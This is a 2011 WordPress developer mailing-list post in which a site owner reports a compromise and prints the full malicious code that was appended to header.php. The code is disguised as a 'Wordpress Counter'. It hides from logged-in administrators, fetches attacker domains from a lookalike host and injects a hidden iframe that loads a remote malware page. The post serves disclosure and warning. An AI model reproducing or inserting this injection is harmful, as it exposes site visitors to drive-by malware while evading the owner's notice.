[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php

Raj Sekharan flarecore at gmail.com
Fri Oct 7 08:22:31 UTC 2011


My website was recently compromised, and my header.php file was appended
with the following code:

<!-- Wordpress Counter -->
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
 if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain =
get_new_domain() ) ) {
 add_option ( 'domain', $newdomain, '', 'no' );
add_option ( 'domain_update', time (), '', 'no' );
 }
if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain =
get_new_domain() ) ) {
 update_option ( 'domain', $newdomain );
update_option ( 'domain_update', time () );
 }

$domain = get_option ( 'domain' );
if ($domain)
 echo
'<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");

function SetCookie (name, value) {
 var argv = SetCookie.arguments;
 var argc = SetCookie.arguments.length;
 var expires = (argc > 2) ? argv[2] : null;
 var path = (argc > 3) ? argv[3] : null;
 var domain = (argc > 4) ? argv[4] : null;
 var secure = (argc > 5) ? argv[5] : false;
 document.cookie = name + "=" + escape (value) +
 ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
 ((path == null) ? "" : ("; path=" + path)) +
 ((domain == null) ? "" : ("; domain=" + domain)) +
 ((secure == true) ? "; secure" : "");
}
</script>
<iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
frameborder="0">
</iframe>';
}

function get_new_domain () {
$url = 'http://googlesafebrowsing.com/remoted.cc.txt';
 if ( function_exists ( 'curl_init' ) ) {
$ch = @curl_init ( $url );
 @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
 @curl_close ( $ch );
}
else
 $doms = @file_get_contents ( $url );
 if ( strpos ( $doms, '||' ) === false )
  return false;

$domains = explode ( '||', trim ( $doms ) );
 return $domains[array_rand ( $domains )];
}
?>

<!-- Wordpress Counter -->

Unlike before where a dummy iframe was just appended, this one ensures that
the logged in administrator cannot actually encounter the malware code. The
attacker even called it "WordPress Counter" in the comment.


More information about the wp-hackers mailing list